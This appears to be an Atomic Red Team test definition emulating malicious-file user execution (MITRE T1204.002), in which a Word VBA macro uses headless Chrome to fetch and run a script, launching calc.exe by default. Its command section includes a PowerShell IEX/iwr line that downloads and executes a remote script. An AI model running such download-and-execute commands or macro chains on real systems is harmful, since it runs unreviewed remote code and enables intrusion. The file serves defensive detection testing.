#TechniqueName: User Execution: Malicious File
#AtomicTestName: Headless Chrome code execution via VBA
#Description: This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local&webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver&and pull down the script and execute it. By default the payload will execute calc.exe on the system.&
#Language: ps1

#get_prereq_commands
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


#commands
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"

